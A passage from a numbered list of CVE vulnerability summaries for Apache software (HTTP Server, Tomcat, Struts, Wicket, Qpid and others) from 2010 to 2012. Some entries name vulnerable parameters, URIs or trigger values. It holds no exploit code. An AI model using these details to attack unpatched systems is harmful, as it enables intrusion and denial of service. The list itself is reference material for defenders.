8724| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
8725| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
8726| [CVE-2012-3467] Apache QPID 0.14, 0.16, and earlier uses a NullAuthenticator mechanism to authenticate catch-up shadow connections to AMQP brokers, which allows remote attackers to bypass authentication.
8727| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
8728| [CVE-2012-3446] Apache Libcloud before 0.11.1 uses an incorrect regular expression during verification of whether the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a crafted certificate.
8729| [CVE-2012-3376] DataNodes in Apache Hadoop 2.0.0 alpha does not check the BlockTokens of clients when Kerberos is enabled and the DataNode has checked out the same BlockPool twice from a NodeName, which might allow remote clients to read arbitrary blocks, write to blocks to which they only have read access, and have other unspecified impacts.
8730| [CVE-2012-3373] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.21 and 1.5.x before 1.5.8 allows remote attackers to inject arbitrary web script or HTML via vectors involving a %00 sequence in an Ajax link URL associated with a Wicket app.
8731| [CVE-2012-3126] Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.
8732| [CVE-2012-3123] Unspecified vulnerability in Oracle Sun Solaris 10 allows remote attackers to affect confidentiality, related to Apache HTTP Server.
8733| [CVE-2012-2760] mod_auth_openid before 0.7 for Apache uses world-readable permissions for /tmp/mod_auth_openid.db, which allows local users to obtain session ids.
8734| [CVE-2012-2733] java/org/apache/coyote/http11/InternalNioInputBuffer.java in the HTTP NIO connector in Apache Tomcat 6.x before 6.0.36 and 7.x before 7.0.28 does not properly restrict the request-header size, which allows remote attackers to cause a denial of service (memory consumption) via a large amount of header data.
8735| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
8736| [CVE-2012-2381] Multiple cross-site scripting (XSS) vulnerabilities in Apache Roller before 5.0.1 allow remote authenticated users to inject arbitrary web script or HTML by leveraging the blogger role.
8737| [CVE-2012-2380] Multiple cross-site request forgery (CSRF) vulnerabilities in the admin/editor console in Apache Roller before 5.0.1 allow remote attackers to hijack the authentication of admins or editors by leveraging the HTTP POST functionality.
8738| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
8739| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
8740| [CVE-2012-2329] Buffer overflow in the apache_request_headers function in sapi/cgi/cgi_main.c in PHP 5.4.x before 5.4.3 allows remote attackers to cause a denial of service (application crash) via a long string in the header of an HTTP request.
8741| [CVE-2012-2145] Apache Qpid 0.17 and earlier does not properly restrict incoming client connections, which allows remote attackers to cause a denial of service (file descriptor consumption) via a large number of incomplete connections.
8742| [CVE-2012-2138] The @CopyFrom operation in the POST servlet in the org.apache.sling.servlets.post bundle before 2.1.2 in Apache Sling does not prevent attempts to copy an ancestor node to a descendant node, which allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP request.
8743| [CVE-2012-2098] Algorithmic complexity vulnerability in the sorting algorithms in bzip2 compressing stream (BZip2CompressorOutputStream) in Apache Commons Compress before 1.4.1 allows remote attackers to cause a denial of service (CPU consumption) via a file with many repeating inputs.
8744| [CVE-2012-1574] The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.
8745| [CVE-2012-1181] fcgid_spawn_ctl.c in the mod_fcgid module 2.3.6 for the Apache HTTP Server does not recognize the FcgidMaxProcessesPerClass directive for a virtual host, which makes it easier for remote attackers to cause a denial of service (memory consumption) via a series of HTTP requests that triggers a process count higher than the intended limit.
8746| [CVE-2012-1089] Directory traversal vulnerability in Apache Wicket 1.4.x before 1.4.20 and 1.5.x before 1.5.5 allows remote attackers to read arbitrary web-application files via a relative pathname in a URL for a Wicket resource that corresponds to a null package.
8747| [CVE-2012-1007] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10 allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter to struts-examples/upload/upload-submit.do, or the message parameter to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do.
8748| [CVE-2012-1006] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.14 and 2.2.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) lastName parameter to struts2-showcase/person/editPerson.action, or the (3) clientName parameter to struts2-rest-showcase/orders.
8749| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
8750| [CVE-2012-0840] tables/apr_hash.c in the Apache Portable Runtime (APR) library through 1.4.5 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.
8751| [CVE-2012-0838] Apache Struts 2 before 2.2.3.1 evaluates a string as an OGNL expression during the handling of a conversion error, which allows remote attackers to modify run-time data values, and consequently execute arbitrary code, via invalid input to a field.
8752| [CVE-2012-0788] The PDORow implementation in PHP before 5.3.9 does not properly interact with the session feature, which allows remote attackers to cause a denial of service (application crash) via a crafted application that uses a PDO driver for a fetch and then calls the session_start function, as demonstrated by a crash of the Apache HTTP Server.
8753| [CVE-2012-0394] ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before 2.3.1.1, when developer mode is used, allows remote attackers to execute arbitrary commands via unspecified vectors. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
8754| [CVE-2012-0393] The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not prevent access to public constructors, which allows remote attackers to create or overwrite arbitrary files via a crafted parameter that triggers the creation of a Java object.
8755| [CVE-2012-0392] The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method.
8756| [CVE-2012-0391] The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.
8757| [CVE-2012-0256] Apache Traffic Server 2.0.x and 3.0.x before 3.0.4 and 3.1.x before 3.1.3 does not properly allocate heap memory, which allows remote attackers to cause a denial of service (daemon crash) via a long HTTP Host header.
8758| [CVE-2012-0216] The default configuration of the apache2 package in Debian GNU/Linux squeeze before 2.2.16-6+squeeze7, wheezy before 2.2.22-4, and sid before 2.2.22-4, when mod_php or mod_rivet is used, provides example scripts under the doc/ URI, which might allow local users to conduct cross-site scripting (XSS) attacks, gain privileges, or obtain sensitive information via vectors involving localhost HTTP requests to the Apache HTTP Server.
8759| [CVE-2012-0213] The UnhandledDataStructure function in hwpf/model/UnhandledDataStructure.java in Apache POI 3.8 and earlier allows remote attackers to cause a denial of service (OutOfMemoryError exception and possibly JVM destabilization) via a crafted length value in a Channel Definition Format (CDF) or Compound File Binary Format (CFBF) document.
8760| [CVE-2012-0053] protocol.c in the Apache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors involving a (1) long or (2) malformed header in conjunction with crafted web script.
8761| [CVE-2012-0047] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.20 allows remote attackers to inject arbitrary web script or HTML via the wicket:pageMapName parameter.
8762| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
8763| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
8764| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
8765| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
8766| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
8767| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
8768| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
8769| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
8770| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
8771| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
8772| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
8773| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
8774| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
8775| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
8776| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
8777| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
8778| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
8779| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
8780| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
8781| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
8782| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
8783| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
8784| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
8785| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
8786| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
8787| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
8788| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
8789| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
8790| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
8791| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
8792| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
8793| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
8794| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
8795| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
8796| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
8797| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
8798| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
8799| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
8800| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
8801| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
8802| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
8803| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
8804| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
8805| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
8806| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
8807| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
8808| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
8809| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
8810| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
8811| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
8812| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
8813| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
8814| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8815| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
8816| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
8817| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
8818| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
8819| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
8820| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
8821| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
8822| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
8823| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
8824| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
8825| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
8826| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
8827| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
8828| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
8829| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
8830| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
8831| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
8832| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
8833| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
8834| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
8835| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
8836| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
